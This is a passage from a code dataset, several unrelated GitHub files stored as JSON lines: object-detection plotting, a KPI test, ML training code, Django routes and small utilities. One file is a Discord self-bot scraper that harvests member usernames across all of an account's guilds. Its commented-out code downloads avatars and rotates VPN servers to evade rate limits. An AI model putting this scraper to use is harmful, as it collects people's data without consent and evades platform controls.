feature_shapes,\n show=True):\n \"\"\"Show detected objects on an image. Show bounding boxes\n and class names.\n\n Arguments:\n image (tensor): Image to show detected objects (0.0 to 1.0)\n classes (tensor): Predicted classes\n offsets (tensor): Predicted offsets\n feature_shapes (tensor): SSD head feature maps\n show (bool): Whether to show bounding boxes or not\n\n Returns:\n class_names (list): List of object class names\n rects (list): Bounding box rectangles of detected objects\n class_ids (list): Class ids of detected objects\n boxes (list): Anchor boxes of detected objects\n \"\"\"\n # generate all anchor boxes per feature map\n anchors = []\n n_layers = len(feature_shapes)\n for index, feature_shape in enumerate(feature_shapes):\n anchor = anchor_boxes(feature_shape,\n image.shape,\n index=index)\n anchor = np.reshape(anchor, [-1, 4])\n if index == 0:\n anchors = anchor\n else:\n anchors = np.concatenate((anchors, anchor), axis=0)\n\n # get all non-zero (non-background) objects\n # objects = np.argmax(classes, axis=1)\n # print(np.unique(objects, return_counts=True))\n # nonbg = np.nonzero(objects)[0]\n if args.normalize:\n print(\"Normalize\")\n anchors_centroid = minmax2centroid(anchors)\n offsets[:, 0:2] *= 0.1\n offsets[:, 0:2] *= anchors_centroid[:, 2:4]\n offsets[:, 0:2] += anchors_centroid[:, 0:2]\n offsets[:, 2:4] *= 0.2\n offsets[:, 2:4] = np.exp(offsets[:, 2:4])\n offsets[:, 2:4] *= anchors_centroid[:, 2:4]\n offsets = centroid2minmax(offsets)\n # convert fr cx,cy,w,h to real offsets\n offsets[:, 0:4] = offsets[:, 0:4] - anchors\n\n objects, indexes, scores = nms(args,\n classes,\n offsets,\n anchors)\n\n class_names = []\n rects = []\n class_ids = []\n boxes = []\n if show:\n fig, ax = plt.subplots(1)\n ax.imshow(image)\n yoff = 1\n for idx in indexes:\n #batch, row, col, box\n anchor = anchors[idx] \n offset = offsets[idx]\n \n anchor += offset[0:4]\n # default anchor box format is \n # xmin, xmax, ymin, ymax\n boxes.append(anchor)\n w = anchor[1] - anchor[0]\n h = anchor[3] - anchor[2]\n x = anchor[0]\n y = anchor[2]\n category = int(objects[idx])\n class_ids.append(category)\n class_name = index2class(category)\n class_name = \"%s: %0.2f\" % (class_name, scores[idx])\n class_names.append(class_name)\n rect = (x, y, w, h)\n print(class_name, rect)\n rects.append(rect)\n if show:\n color = get_box_color(category)\n rect = Rectangle((x, y),\n w,\n h,\n linewidth=2,\n edgecolor=color,\n facecolor='none')\n ax.add_patch(rect)\n bbox = dict(color='white',\n alpha=1.0)\n ax.text(anchor[0] + 2,\n anchor[2] - 16 + np.random.randint(0,yoff),\n class_name,\n color=color,\n #fontweight='bold',\n bbox=bbox,\n fontsize=10,\n verticalalignment='top')\n yoff += 50\n #t.set_bbox(dict(facecolor='red', alpha=0.5, edgecolor='red'))\n\n if show:\n plt.savefig(\"detection.png\", dpi=600)\n plt.show()\n\n return class_names, rects, class_ids, boxes\n\n\ndef show_anchors(image,\n feature_shape,\n anchors,\n maxiou_indexes=None,\n maxiou_per_gt=None,\n labels=None,\n show_grids=False):\n \"\"\"Utility for showing anchor boxes for debugging purposes\"\"\"\n image_height, image_width, _ = image.shape\n _, feature_height, feature_width, _ = feature_shape\n\n fig, ax = plt.subplots(1)\n ax.imshow(image)\n if show_grids:\n grid_height = image_height // feature_height\n for i in range(feature_height):\n y = i * grid_height\n line = Line2D([0, image_width], [y, y])\n ax.add_line(line)\n\n grid_width = image_width // feature_width\n for i in range(feature_width):\n x = i * grid_width\n line = Line2D([x, x], [0, image_height])\n ax.add_line(line)\n\n # maxiou_indexes is (4, n_gt)\n for index in range(maxiou_indexes.shape[1]):\n i = maxiou_indexes[1][index]\n j = maxiou_indexes[2][index]\n k = maxiou_indexes[3][index]\n # color = label_utils.get_box_color()\n box = anchors[0][i][j][k] #batch, row, col, box\n # default anchor box format is xmin, xmax, ymin, ymax\n w = box[1] - box[0]\n h = box[3] - box[2]\n x = box[0]\n y = box[2]\n # Rectangle ((xmin, ymin), width, height) \n rect = Rectangle((x, y),\n w,\n h,\n linewidth=2,\n edgecolor='y',\n facecolor='none')\n ax.add_patch(rect)\n\n if maxiou_per_gt is not None and labels is not None:\n # maxiou_per_gt[index] is row w/ max iou\n iou = np.amax(maxiou_per_gt[index])\n #argmax_index = np.argmax(maxiou_per_gt[index])\n #print(maxiou_per_gt[index])\n # offset\n label = labels[index]\n category = int(label[4])\n class_name = index2class(category)\n color = label_utils.get_box_color(category)\n bbox = dict(facecolor=color, color=color, alpha=1.0)\n ax.text(label[0],\n label[2],\n class_name,\n color='w',\n fontweight='bold',\n bbox=bbox,\n fontsize=16,\n verticalalignment='top')\n dxmin = label[0] - box[0]\n dxmax = label[1] - box[1]\n dymin = label[2] - box[2]\n dymax = label[3] - box[3]\n print(index, \":\", \"(\", class_name, \")\", iou, dxmin, dxmax, dymin, dymax, label[0], label[2])\n\n if labels is None:\n plt.show()\n\n return fig, ax\n","repo_name":"PacktPublishing/Advanced-Deep-Learning-with-Keras","sub_path":"chapter11-detection/boxes.py","file_name":"boxes.py","file_ext":"py","file_size_in_byte":9795,"program_lang":"python","lang":"en","doc_type":"code","stars":1645,"dataset":"github-code","pt":"52"} +{"seq_id":"20000802177","text":"from unittest import TestCase\nfrom datetime import datetime, timedelta\n\nfrom dplib import KPI\nfrom dplib.testing import ResultAssertions\nfrom dplib.result import Result\nimport dplib as dp\n\nNOW = datetime.now()\n\nTIMES = [NOW, NOW + timedelta(seconds=1), NOW + timedelta(seconds=2)]\nD1 = dp.Dataset({\n 'Voltage': dp.Series([1.23, 5.32, 8.19], TIMES),\n 'Current': dp.Series([0.32, -3.2, 4.2555], TIMES),\n})\n\nD2 = dp.Dataset({\n 'volts': dp.Series([1.23, 5.32, 8.19], TIMES),\n 'amps': dp.Series([0.32, -3.2, 4.2555], TIMES),\n})\n'''\nSame as D1, but with different names.\n'''\n\nID_KPI = KPI('x')\n'''\nAn identity KPI. A KPI which simply returns the input value.\n'''\n\nPOWER_KPI = KPI('Voltage * Current')\n'''\nDoes a power computation (voltage times current).\n'''\n\nAVG_POWER_KPI = KPI('avg(Voltage * Current)')\nMAX_POWER_KPI = KPI('max(Voltage * Current)')\nMIN_POWER_KPI = KPI('min(Voltage * Current)')\n\nCOMPOUND_KPI = KPI('min(Voltage) * 0.2 + max(Current) * 0.6')\n\nD_POWER = dp.Dataset({\n 'Power': dp.Series([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555], TIMES),\n})\n'''\nThe result of multiplying Voltage and Current from D1 and D2.\n'''\n\nclass TestKPI(TestCase, ResultAssertions):\n def test_identity_kpi(self):\n '''Test a KPI that does a NOOP.'''\n result = ID_KPI.run('Identity', D1, {\n 'x': 'Voltage',\n })\n self.assertResultEqual(result, Result(D1.select(['Voltage']).rename({ 'Voltage': 'Identity' })))\n\n def test_default_mappings(self):\n '''The default mappings should match the symbols used in the KPI computation.'''\n result = POWER_KPI.run('Power', D1)\n self.assertResultEqual(result, D_POWER)\n\n def test_compound_kpi(self):\n result = COMPOUND_KPI.run('Value', D1)\n self.assertEqual(result.get_aggregations(), {\n 'Value': min([1.23, 5.32, 8.19]) * 0.2 + max([0.32, -3.2, 4.2555]) * 0.6,\n })\n\n def test_average_power(self):\n result = AVG_POWER_KPI.run('Average Power', D1)\n self.assertEqual(result.get_aggregations(), {\n 'Average Power': sum([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]) / 3,\n })\n\n def test_max_power(self):\n result = MAX_POWER_KPI.run('Max Power', D1)\n self.assertEqual(result.get_aggregations(), {\n 'Max Power': max([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]),\n }) \n\n def test_min_power(self):\n result = MAX_POWER_KPI.run('Min Power', D1)\n self.assertEqual(result.get_aggregations(), {\n 'Min Power': max([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]),\n }) \n\n def test_excluding_time_column(self):\n result = POWER_KPI.run('Power', D1)\n self.assertResultEqual(result, dp.Dataset({\n 'Power': dp.Series([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555], TIMES),\n }))\n\n def test_mappings(self):\n '''The input Dataset should be able to map its input column names.'''\n result = POWER_KPI.run('Power', D2, {\n 'Voltage': 'volts',\n 'Current': 'amps',\n })\n self.assertResultEqual(result, D_POWER)\n\ntest_suite = TestKPI\n","repo_name":"bergerab/dps","sub_path":"dplib/tests/test_kpi.py","file_name":"test_kpi.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2242912528","text":"import discum, json, requests, datetime, os, time, threading\r\nfrom colorama import Fore\r\n\r\n__token__ = \"YOUR TOKEN\"\r\ndef get_time():\r\n now = datetime.datetime.now()\r\n current_time = now.strftime(\"%H:%M:%S\")\r\n return current_time\r\ndef pprint(text): print(f\" {Fore.LIGHTCYAN_EX}[{get_time()}]{Fore.RESET} {Fore.RED}=>{Fore.WHITE} {text}\")\r\n\r\nbot = discum.Client(token=__token__, log=False)\r\ntotal = 0\r\namount_pfp = 0\r\nfailed = 0\r\namount = 0\r\n\r\ndef getheaders(token=None, content_type=\"application/json\"):\r\n\theaders = {\"Content-Type\": content_type, \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\" }\r\n\tif token: headers.update({\"Authorization\": token})\r\n\treturn headers\r\nguildsIds = requests.get(\"https://discord.com/api/v8/users/@me/guilds\", headers=getheaders(__token__)).json()\r\ndef close_after_fetching(resp, guild_id):\r\n\tif bot.gateway.finishedMemberFetching(guild_id): bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}});bot.gateway.close()\r\ndef get_members(guild_id, channel_id): bot.gateway.fetchMembers(guild_id, channel_id, keep=\"all\", wait=1);bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}}); bot.gateway.run(); bot.gateway.resetSession() ;return bot.gateway.session.guild(guild_id).members\r\nfor guildidsss in guildsIds:\r\n\ttry:\r\n\t\tguild_id = guildidsss['id']\r\n\t\tguild_name = guildidsss['name']\r\n\t\tpprint(f\"Getting channels | GUILD: {guild_name}, ID: {guild_id}\")\r\n\t\tchannels = requests.get(f\"https://discord.com/api/v9/guilds/{guildidsss['id']}/channels\", headers=getheaders(__token__)).json()\r\n\t\tfor channel in channels:\r\n\t\t\tchannel_id = channel['id']\r\n\t\t\tbreak\r\n\t\tpprint(\"Getting names\")\r\n\t\ttry: members = get_members(guild_id, channel_id)\r\n\t\texcept Exception as e:\r\n\t\t\tpprint(f\"{Fore.RED}[ERROR]{Fore.RESET} {e}\")\r\n\t\t\tcontinue\r\n\t\tids = []\r\n\t\tfor key in members.keys(): ids.append(key)\r\n\t\tpprint(f\"Got {Fore.GREEN}{len(ids)}{Fore.RESET} names\")\r\n\t\tfor username in ids:\r\n\t\t\ttry:\r\n\t\t\t\tuserid = members[username]['presence']['user']['id']\r\n\t\t\t\t# remove the hashtags to also scrape pfps (change the `mullvad connect` to some other vpn or just add proxy support)\r\n\t\t\t\t#\r\n\t\t\t\t# try:\r\n\t\t\t\t# \tuserprofile = requests.get(f\"https://discord.com/api/v9/users/{userid}/profile\", headers=getheaders(__token__)).json()\r\n\t\t\t\t# \tr = requests.get(f\"https://cdn.discordapp.com/avatars/{userid}/{userprofile['user']['avatar']}.png?size=2048\")\r\n\t\t\t\t# \timg_data = r.content\r\n\t\t\t\t# \tif r.status_code == 200:\r\n\t\t\t\t# \t\tpprint(f\"Saving PFP status code: {Fore.GREEN}{r.status_code}{Fore.RESET} | Total saved: {Fore.GREEN}{amount_pfp}{Fore.RESET}\")\r\n\t\t\t\t# \t\tamount_pfp += 1\r\n\t\t\t\t# \telse: pprint(f\"Status code: {Fore.RED}{r.status_code} {Fore.RESET}| Username: {Fore.RED}{username}{Fore.RESET}\")\r\n\t\t\t\t# \twith open(f'pfps\\\\{userid}.png', 'wb') as sex: sex.write(img_data)\r\n\t\t\t\t# \tif amount > 100:\r\n\t\t\t\t# \t\tpprint(\"Hit 100 pfps, changing Mullvad Servers\")\r\n\t\t\t\t# \t\tos.system(\"mullvad disconnect\")\r\n\t\t\t\t# \t\ttime.sleep(4)\r\n\t\t\t\t# \t\tos.system(\"mullvad connect\")\r\n\t\t\t\t# \t\ttime.sleep(4)\r\n\t\t\t\t# \t\tpprint(\"Done changing Mullvad Servers, amount saved is now 0\")\r\n\t\t\t\t# \t\tamount = 0\r\n\t\t\t\t# except: pprint(f\"Failed to get profile for {members[username]['username']}#{members[username]['discriminator']}\")\r\n\t\t\t\twith open(\"names.txt\", \"a\") as f: \r\n\t\t\t\t\ttotal += 1\r\n\t\t\t\t\tf.write(members[username][\"username\"] + \"\\n\")\r\n\t\t\t\t\tamount += 1\r\n\t\t\texcept Exception as e: failed += 1\r\n\t\tpprint(f\"Done saving {guild_name}\\n\")\r\n\texcept:pass\r\npprint(f\"\\n\\nDone! Total (tried to) save: {Fore.GREEN}{total}{Fore.RESET} in a total of {Fore.GREEN}{len(guildsIds)} {Fore.RESET} guilds | Failed: {Fore.RED}{failed}{Fore.RESET}\\n {Fore.LIGHTCYAN_EX}[{get_time()}]{Fore.RESET} {Fore.RED}=>{Fore.WHITE} Actual amount in text file: {Fore.GREEN}{amount}\")\r\n","repo_name":"DaniEnsi/discord-member-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"7495543635","text":"import logging\nimport pickle\nfrom datetime import datetime\n\nimport numpy as np\nimport torch\nfrom dynaconf import settings\n\nfrom paths import data_directory_path\nfrom language_loader import LanguageLoader\nfrom model import Model\nfrom model_parameters import ModelParameters\n\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(filename='training_history.log', level=logging.INFO)\n\n\nclass TrainingEngine:\n \"\"\"\n Integrates the different modules into one and trains the model.\n \"\"\"\n\n def __init__(self):\n\n if torch.cuda.is_available():\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n\n logger.info(f'Initializing the TrainingEngine on {self.device}')\n\n self.loader = LanguageLoader()\n\n self.model_parameters = ModelParameters(embedding_size=self.loader.cipher_database.number_of_items)\n\n self.model = Model(self.loader.cipher_database,\n self.loader.plain_database,\n self.model_parameters,\n self.device)\n\n model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n\n logger.info(f'Initialized TrainingEngine with {params} trainable parameters')\n\n def train_model(self, num_iterations):\n \"\"\"\n Train the model for the given number of iterations.\n \"\"\"\n losses = []\n logger.info('Starting Training')\n cipher_batches, plain_batches = self.loader.get_batches(number_of_batches=num_iterations,\n batch_size=settings.BATCH_SIZE)\n\n for iteration in range(num_iterations):\n\n input_tensor = cipher_batches[iteration].to(self.device)\n target_tensor = plain_batches[iteration].to(self.device)\n\n loss = self.model.train(input_tensor, target_tensor)\n\n losses.append(loss)\n\n if iteration % 500 == 0:\n logger.info(f\"{datetime.now().time()} \"\n f\"Iteration: {iteration} out of {num_iterations}, \"\n f\"Loss: {np.round(np.mean(losses), 4)}\")\n losses = []\n print(loss)\n logger.info('Training Complete. Saving components.')\n\n self.serialize_components()\n\n def serialize_components(self):\n \"\"\"\n Serialize the model and the data loader\n \"\"\"\n torch.save(self.model, data_directory_path / 'serialized_model.pth.tar')\n\n with open(data_directory_path / 'serialized_loader.p', 'wb') as loader:\n pickle.dump(self.loader, loader)\n\n logger.info('Saving components complete.')\n\n\nif __name__ == '__main__':\n engine = TrainingEngine()\n engine.train_model(90000)\n","repo_name":"fin-vermehr/enigma","sub_path":"src/training_engine.py","file_name":"training_engine.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12030789484","text":"from django.urls import path\nfrom . import views\nfrom .views import PostListView,PostDetailView, PostCreateView, PostDeleteView, likes_view\n\nurlpatterns = [\n path('', PostListView.as_view(), name = 'blog-home'),\n path('post//', PostDetailView.as_view(), name = 'post-detail'),\n path('post/new/', PostCreateView.as_view(), name = 'post-create'),\n path('post//delete/', PostDeleteView.as_view(), name = 'post-delete'),\n path('like//', views.likes_view,name='post-like'),\n\n]\n##Old path for detail view\n##path('post//', views.POST_DETAIL, name = 'post-detail'),\n","repo_name":"ahamedt/PennApps-submission","sub_path":"BlogApp/Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74960272483","text":"import tensorflow as tf \r\nimport numpy as np \r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\n\r\nimport os\r\nimport urllib.request\r\nimport pickle\r\nimport gzip\r\n\r\ndef load_batch(filename):\r\n\tf = open(filename, \"rb\").read()\r\n\tsize = 32*32*3+1\r\n\tlabels = []\r\n\timages = []\r\n\tfor i in range(10000):\r\n\t\tarr = np.fromstring(f[i*size:(i+1)*size], dtype=np.uint8)\r\n\t\tlab = np.identity(10)[arr[0]]\r\n\t\timg = arr[1:].reshape((3, 32, 32)).transpose((1, 2, 0))\r\n\r\n\t\tlabels.append(lab)\r\n\t\timages.append((img/255))\r\n\treturn np.array(images), np.array(labels)\r\n\r\nclass CIFAR:\r\n\tdef __init__(self):\r\n\t\ttrain_data = []\r\n\t\ttrain_labels = []\r\n\r\n\t\tif not os.path.exists(\"cifar-10-batches-bin\"):\r\n\t\t\turllib.request.urlretrieve(\"https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz\",\r\n \"cifar-data.tar.gz\")\r\n\t\t\tos.popen(\"tar -xzf cifar-data.tar.gz\").read()\r\n\r\n\t\tfor i in range(5):\r\n\t\t\tr, s = load_batch(\"cifar-10-batches-bin/data_batch_\"+str(i+1)+\".bin\")\r\n\t\t\ttrain_data.extend(r)\r\n\t\t\ttrain_labels.extend(s)\r\n\r\n\t\ttrain_data = np.array(train_data, dtype=np.float32)\r\n\t\ttrain_labels = np.array(train_labels)\r\n\r\n\t\tself.test_data, self.test_labels = load_batch(\"cifar-10-batches-bin/test_batch.bin\")\r\n\r\n\t\tVALIDATION_SIZE = 5000\r\n\r\n\t\tself.validation_data = train_data[:VALIDATION_SIZE, :, :, :]\r\n\t\tself.validation_labels = train_labels[:VALIDATION_SIZE, :]\r\n\t\tself.train_data = train_data[VALIDATION_SIZE:, :, :, :]\r\n\t\tself.train_labels = train_labels[VALIDATION_SIZE:, :]\r\n\r\nclass CIFARModel:\r\n\tdef __init__(self, restore=None):\r\n\t\tself.num_channels = 3\r\n\t\tself.image_size = 32\r\n\t\tself.num_labels = 10\r\n\r\n\t\tmodel = Sequential()\r\n\r\n\t\tmodel.add(Conv2D(64, (3, 3), input_shape=(32, 32, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Conv2D(64, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n\t\tmodel.add(Conv2D(128, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Conv2D(128, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n\t\tmodel.add(Flatten())\r\n\t\tmodel.add(Dense(256))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Dense(256))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Dense(10))\r\n\r\n\t\tif restore:\r\n\t\t\tmodel.load_weights(restore)\r\n\r\n\t\tself.model = model\r\n\r\n\t\tdef predict(self, data):\r\n\t\t\treturn self.model(data)\r\n","repo_name":"HAOYUN49/Evolutionary","sub_path":"setup_cifar.py","file_name":"setup_cifar.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11951808477","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm\nfrom .models import Profile\n\n\nclass EditEmailForm(UserChangeForm):\n\n class Meta:\n model = User\n fields = {\n 'email'\n }\n\n\nclass EditNamesForm(UserChangeForm):\n\n class Meta:\n model = User\n fields = {\n 'first_name',\n 'last_name'\n }\n\n\nclass EditProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = {\n 'nr_dowodu',\n 'nr_prawa_jazdy',\n 'nr_telefonu'\n }\n","repo_name":"kamip123/rentAndGo","sub_path":"profil/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73453463204","text":"\"\"\"\nLeetcode 746\n\nYou are given an integer array cost where cost[i] is the cost of ith step on a staircase.\n Once you pay the cost, you can either climb one or two steps.\n\nYou can either start from the step with index 0, or the step with index 1.\n\nReturn the minimum cost to reach the top of the floor.\n\n\nExample 1:\n\nInput: cost = [10,15,20]\nOutput: 15\nExplanation: You will start at index 1.\n- Pay 15 and climb two steps to reach the top.\nThe total cost is 15.\nExample 2:\n\nInput: cost = [1,100,1,1,1,100,1,1,100,1]\nOutput: 6\n\n\"\"\"\n\nfrom typing import Optional\nclass Solution:\n def minCostClimbingStairs(self, cost: list[int], n:Optional[int]=None, dp:Optional[list[int]]=None) -> int:\n if n is None:\n n = len(cost)\n cost.append(0)\n self.minCostClimbingStairs(cost,n,dp)\n if dp is None:\n dp = [-1] * (n+1)\n if dp[n] != -1:\n return dp[n]\n if n == 0:\n dp[0] = cost[0]\n return dp[0]\n if n == 1:\n dp[1] = cost[1]\n return dp[1]\n dp[n] = cost[n] + min(self.minCostClimbingStairs(cost,n-2,dp), self.minCostClimbingStairs(cost,n-1,dp))\n return dp[n]\n\nprint(Solution().minCostClimbingStairs([10,15,20]))\nprint(Solution().minCostClimbingStairs([1,100,1,1,1,100,1,1,100,1]))\n","repo_name":"clintjohnsn/ds-algo","sub_path":"dynamic programming/easy/min_cost_climbing_stairs.py","file_name":"min_cost_climbing_stairs.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23485420202","text":"#!/usr/bin/env python3\n\n###############################################\n# Author: B. Anderson\n# Date: Aug 2023\n# Description: parse the results of a series of RELAX runs to select optimal values\n#\tThis assumes the results have already been tabulated in csv files, with a column of samples,\n#\tand three columns per gene corresponding to K, p and LogL of the RELAX alternative model\n#\tArguments are the csv files (one per run; at least two), which should have the same unique taxa and genes\n###############################################\n\n\nimport sys\nimport argparse\n\n\n# instantiate the parser\nparser = argparse.ArgumentParser(description = 'A script to parse tabulated (csv file) RELAX outputs')\n\n\n# add arguments to parse\nparser.add_argument('results', type = str, nargs = '*', help = 'The csv result files; these need to have ' +\n\t'the same samples and genes in each.')\n\n\n# parse the command line\nif len(sys.argv[1:]) == 0:\t\t# if there are no arguments\n\tparser.print_help(sys.stderr)\n\tsys.exit(1)\nargs = parser.parse_args()\nresults = args.results\n\nif len(results) < 2:\n\tprint('Please provide at least two run results files\\n')\n\tparser.print_help(sys.stderr)\n\tsys.exit(1)\n\n\n# Read in the results\ngene_list = []\ntaxa = []\nmaster_list = []\nfor fileno, result_file in enumerate(results):\n\twith open(result_file, 'r') as infile:\n\t\tfor lineno, line in enumerate(infile):\n\t\t\tparts = line.strip().split(',')\n\t\t\tif lineno == 0:\n\t\t\t\tgene_entries = parts[1: ]\n\t\t\t\tif fileno == 0:\t\t# first file\n\t\t\t\t\tfor gene in gene_entries:\n\t\t\t\t\t\tif gene not in gene_list:\n\t\t\t\t\t\t\tgene_list.append(gene)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\telif len(gene_list) != (len(gene_entries) / 3):\n\t\t\t\t\tprint('Wrong number of gene entries in ' + str(result_file))\n\t\t\t\t\tparser.print_help(sys.stderr)\n\t\t\t\t\tsys.exit(1)\n\t\t\telse:\n\t\t\t\ttaxon = parts[0]\n\t\t\t\tif fileno == 0:\t\t# first file\n\t\t\t\t\ttaxa.append(taxon)\n\t\t\t\telif taxon not in taxa:\n\t\t\t\t\tprint('Wrong taxon in ' + str(result_file))\n\t\t\t\t\tparser.print_help(sys.stderr)\n\t\t\t\t\tsys.exit(1)\n\t\t\t\t\n\t\t\t\tmaster_list.append([taxon, parts[1: ]])\n\n\n# Go through the samples in the list and choose the best values for each sample\n# Determine the p-value significance and indicate it where appropriate\n# Round the K value\n# Count how many significant runs had K < 1 and how many had K > 1 (to assess bimodality)\nout_list = []\nfor taxon in taxa:\n\ttop_list = []\n\tresult_list = [item[1] for item in master_list if item[0] == taxon]\t\t# grab the runs for that taxon\n\tfor index, gene in enumerate(gene_list):\n\t\tif result_list[0][index * 3] == '-':\t\t# gene missing\n\t\t\ttop_list.append(['-', '-'])\n\t\telse:\n\t\t\tKvals = [float(item[index * 3 + 0]) for item in result_list]\n\t\t\tpvals = [float(item[index * 3 + 1]) for item in result_list]\n\t\t\tLvals = [float(item[index * 3 + 2]) for item in result_list]\n\t\t\t# determine top likelihood and corresponding K and p for reporting\n\t\t\tmax_index = Lvals.index(max(Lvals))\n\t\t\tif pvals[max_index] < 0.05:\n\t\t\t\tif pvals[max_index] < 0.01:\n\t\t\t\t\tif pvals[max_index] < 0.001:\n\t\t\t\t\t\tsignif = '< 0.001'\n\t\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '***'\n\t\t\t\t\telse:\n\t\t\t\t\t\tsignif = '< 0.01'\n\t\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '**'\n\t\t\t\telse:\n\t\t\t\t\tsignif = '< 0.05'\n\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '*'\n\t\t\telse:\n\t\t\t\tsignif = 'n.s.'\n\t\t\t\ttop_K = str(round(Kvals[max_index], 1))\n\t\t\t# determine how many significant runs had divergent K values (< 1 and > 1)\n\t\t\tsig_indices = [i for i, pval in enumerate(pvals) if pval < 0.05]\n\t\t\tif len(sig_indices) == 0:\t\t# no significant runs\n\t\t\t\tcount_blurb = 'n.s.'\n\t\t\telse:\n\t\t\t\tsig_Kvals = [Kvals[i] for i in sig_indices]\n\t\t\t\tcount_greater = len([item for item in sig_Kvals if item >= 1])\n\t\t\t\tcount_less = len([item for item in sig_Kvals if item < 1])\n\t\t\t\tcount_blurb = str(count_less) + '/' + str(count_greater) + \\\n\t\t\t\t\t' of ' + str(count_greater + count_less)\n\t\t\t# record\n\t\t\ttop_list.append([top_K, count_blurb])\n\tout_list.append([taxon, top_list])\n\n\n# Print the output as csv (can be directed to a file with \">\")\nprint('Sample,' + ','.join([(item + ',' + item) for item in gene_list]))\nfor entry in out_list:\n\tprint(entry[0] + ',' + ','.join([','.join(item) for item in entry[1]]))\n","repo_name":"bmichanderson/scripts","sub_path":"relax_parse.py","file_name":"relax_parse.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33426519637","text":"import sys, inspect, pprint, logging, os\n\nfrom config import *\n\n# ################################# Log ################################# #\nDEBUG = 0\nINFO = 1\nWARNING = 2\nERROR = 3\nCRITICAL = 4\n\nLOGGER_NAME = 'edge_cloud'\n\nlogger = logging.getLogger(LOGGER_NAME)\nlogger.setLevel(logging.INFO)\n# logger.setLevel(logging.DEBUG)\n\n# FORMAT = '[%(asctime)s - %(funcName)10s()] %(msg)s'\n# FORMAT = '[%(asctime)s - %(func_name)6s()] %(msg)s'\n# FORMAT = '[%(filename)s:%(lineno)d] %(func_name):: %(msg)s'\nFORMAT = '%(levelname)s] %(func_name)s: %(msg)s'\n# logger.basicConfig(format=FORMAT, level=logging.DEBUG) # filename='c.log'\nformatter = logging.Formatter(FORMAT)\n\ndef log_to_std():\n\tlogger = logging.getLogger(LOGGER_NAME)\n\tsh = logging.StreamHandler()\n\tsh.setFormatter(formatter)\n\tlogger.addHandler(sh)\n\nlevel_log_m = {INFO: logger.info, DEBUG: logger.debug, WARNING: logger.warning, ERROR: logger.error, CRITICAL: logger.critical}\n\ndef log_to_file(filename, directory='./log'):\n if directory and not os.path.exists(directory):\n os.makedirs(directory)\n\n logger = logging.getLogger(LOGGER_NAME)\n\n filepath = '{}/{}'.format(directory, filename)\n fh = logging.FileHandler(filepath, mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef get_extra():\n\t# caller_list = []\n\t# frame = inspect.currentframe().f_back\n\t# while frame.f_back:\n\t#\t\tcaller_list.append('{0}'.format(frame.f_code.co_name))\n\t#\t\tframe = frame.f_back\n\t# callers =\t '/'.join(reversed(caller_list))\n\n\t# return {'func_name': '{0}'.format((inspect.currentframe().f_back.f_back).f_code.co_name)}\n\tframe = inspect.currentframe().f_back.f_back.f_code\n\treturn {'func_name': '{}::{}'.format(os.path.split(frame.co_filename)[1], frame.co_name)}\n\ndef log(level: int, _msg_: str, **kwargs):\n\tlevel_log_m[level](\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\n# Always log\ndef alog(level: int, _msg_: str, **kwargs):\n\tlogger.critical(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\ndef pstr(**kwargs):\n\ts = ''\n\tfor k, v in kwargs.items():\n\t\ts += \" {}: {}\\n\".format(k, 